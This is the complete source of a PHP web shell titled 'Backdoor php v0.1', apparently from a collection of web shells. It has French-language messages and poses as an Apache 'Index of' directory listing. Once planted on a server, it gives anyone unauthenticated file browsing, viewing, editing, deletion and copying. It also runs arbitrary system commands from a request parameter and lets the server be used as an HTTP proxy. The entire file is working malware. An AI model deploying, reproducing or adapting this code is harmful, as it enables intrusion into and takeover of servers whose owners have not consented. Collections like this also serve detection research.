webshell/xakep-shells/PHP/backdoor1.php.txt
2014-05-18 09:06:34 +08:00

181 lines
No EOL
5.6 KiB
Text

<?
/*
Backdoor php v0.1
Coded By Charlichaplin
charlichaplin@gmail.com
Join me: irc.fr.worldnet.net #s-c
Greetz: My dog :)
*/
class backdoor {
var $pwd;
var $rep;
var $list = array();
var $file;
var $edit;
var $fichier;
var $del;
var $shell;
var $proxy;
function dir() {
if(!empty($this->rep)) {
$dir = opendir($this->rep);
} else {
$dir = opendir($this->pwd);
}
while($f = readdir($dir)) {
if ($f !="." && $f != "..") {
$this->list[] = $f;
}
}
}
function view() {
$this->file = htmlentities(highlight_file($this->file));
}
function edit() {
if(!is_writable($this->edit)) {
echo "Ecriture impossible sur le fichier";
} elseif(!file_exists($this->edit)) {
echo "Le fichier n'existe pas ";
} elseif(!$this->fichier) {
$fp = fopen($this->edit,"r");
$a = "";
while(!feof($fp)) {
$a .= fgets($fp,1024);
}
echo"<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?edit=".$this->edit."\"><textarea name=\"fichier\" cols=\"50\" rows=\"20\">".htmlentities($a)."</textarea><input name=\"Submit\" type=\"submit\"></form>";
} else {
$fp = fopen($this->edit,"w+");
fwrite($fp, $this->fichier);
fclose($fp);
echo "Le fichier a été modifié";
}
}
function del() {
if(is_file($this->del)) {
if(unlink($this->del)) {
echo "Fichier supprimé";
} else {
echo "Vous n'avez pas les droits pour supprimer ce fichier";
}
} else {
echo $this->del." n'est pas un fichier";
}
}
function shell() {
echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."\"><input name=\"shell\" type=\"text\"><input type=\"submit\" name=\"Shell\"></form><br>";
system($this->shell);
}
function proxy($host,$page) {
$fp = fsockopen($host,80);
if (!$fp) {
echo "impossible d'etablir un connection avec l'host";
} else {
$header = "GET ".$page." HTTP/1.1\r\n";
$header .= "Host: ".$host."\r\n";
$header .= "Connection: close\r\n\r\n";
fputs($fp,$header);
while (!feof($fp)) {
$line = fgets($fp,1024);
echo $line;
}
fclose($fp);
}
}
function ccopy($cfichier,$cdestination) {
if(!empty($cfichier) && !empty($cdestination)) {
copy($cfichier, $cdestination);
echo "Le fichier a été copié";
} else {
echo "<form method=\"POST\" action=\"".$_SERVER['PHP_SELF']."?copy=1\">Source: <input type=\"text\" name=\"cfichier\"><br>Destination: <input type=\"text\" name=\"cdestination\"><input type=\"submit\" title=\"Submit\"></form>";
}
}
}
if(!empty($_REQUEST['rep'])) {
$rep = $_REQUEST['rep']."/";
}
$pwd = $_SERVER['SCRIPT_FILENAME'];
$pwd2 = explode("/",$pwd);
$file = $_REQUEST['file'];
$edit = $_REQUEST['edit'];
$fichier = $_POST['fichier'];
$del = $_REQUEST['del'];
$shell = $_REQUEST['shell'];
$proxy = $_REQUEST['proxy'];
$copy = $_REQUEST['copy'];
$cfichier = $_POST['cfichier'];
$cdestination = $_POST['cdestination'];
$n = count($pwd2);
$n = $n - 1;
$pwd = "";
for ($i = 0;$i != $n;$i = $i+1) {
$pwd .= "/".$pwd2[$i];
}
if($proxy) {
$host2 = explode("/",$proxy);
$n = count($host2);
$host = $host2[2];
$page = "";
for ($i = 3;$i != $n;$i = $i+1) {
$page .= "/".$host2[$i];
}
echo $page;
}
echo "<HTML><HEAD><TITLE>Index of ".$pwd."</TITLE>";
$backdoor = new backdoor();
$backdoor->pwd = $pwd;
$backdoor->rep = $rep;
$backdoor->file = $file;
$backdoor->edit = $edit;
$backdoor->fichier = $fichier;
$backdoor->del = $del;
$backdoor->shell = $shell;
$backdoor->proxy = $proxy;
echo "<TABLE><TR><TD bgcolor=\"#ffffff\" class=\"title\"><FONT size=\"+3\" face=\"Helvetica,Arial,sans-serif\"><B>Index of ".$backdoor->pwd."</B></FONT>";
$backdoor->dir();
echo "</TD></TR></TABLE><PRE>";
echo "<a href=\"".$_SERVER['PHP_SELF']."?shell=id\">Executer un shell</a> ";
echo "<a href=\"".$_SERVER['PHP_SELF']."?proxy=http://www.cnil.fr/index.php?id=123\">Utiliser le serveur comme proxy</a> ";
echo "<a href=\"".$_SERVER['PHP_SELF']."?copy=1\">Copier un fichier</a> <br>";
echo "<IMG border=\"0\" src=\"/icons/blank.gif\" ALT=\" \"> <A HREF=\"\">Name</A> <A HREF=\"\">Last modified</A> <A HREF=\"\">Size</A> <A HREF=\"\">Description</A>";
echo "<HR noshade align=\"left\" width=\"80%\">";
if($file) {
$backdoor->view();
} elseif($edit) {
$backdoor->edit();
} elseif($del) {
$backdoor->del();
} elseif($shell) {
$backdoor->shell();
}elseif($proxy) {
$backdoor->proxy($host,$page);
}elseif($copy == 1) {
$backdoor->ccopy($cfichier,$cdestination);
} else {
echo "[DIR] <A HREF=\"".$_SERVER['PHP_SELF']."?rep=".realpath($rep."../")."\">Parent Directory</A> ".date("r",realpath($rep."../"))." - <br>";
foreach ($backdoor->list as $key => $value) {
if(is_dir($rep.$value)) {
echo "[DIR]<A HREF=\"".$_SERVER['PHP_SELF']."?rep=".$rep.$value."\">".$value."/</A> ".date("r",filemtime($rep.$value))." - <br>";
} else {
echo "[FILE]<A HREF=\"".$_SERVER['PHP_SELF']."?file=".$rep.$value."\">".$value."</A> <a href=\"".$_SERVER['PHP_SELF']."?edit=".$rep.$value."\">(edit)</a> <a href=\"".$_SERVER['PHP_SELF']."?del=".$rep.$value."\">(del)</a> ".date("r",filemtime($rep.$value))." 1k <br>";
}
}
}
echo "</PRE><HR noshade align=\"left\" width=\"80%\">";
echo "<center><b>Coded By Charlichaplin</b></center>";
echo "</BODY></HTML>";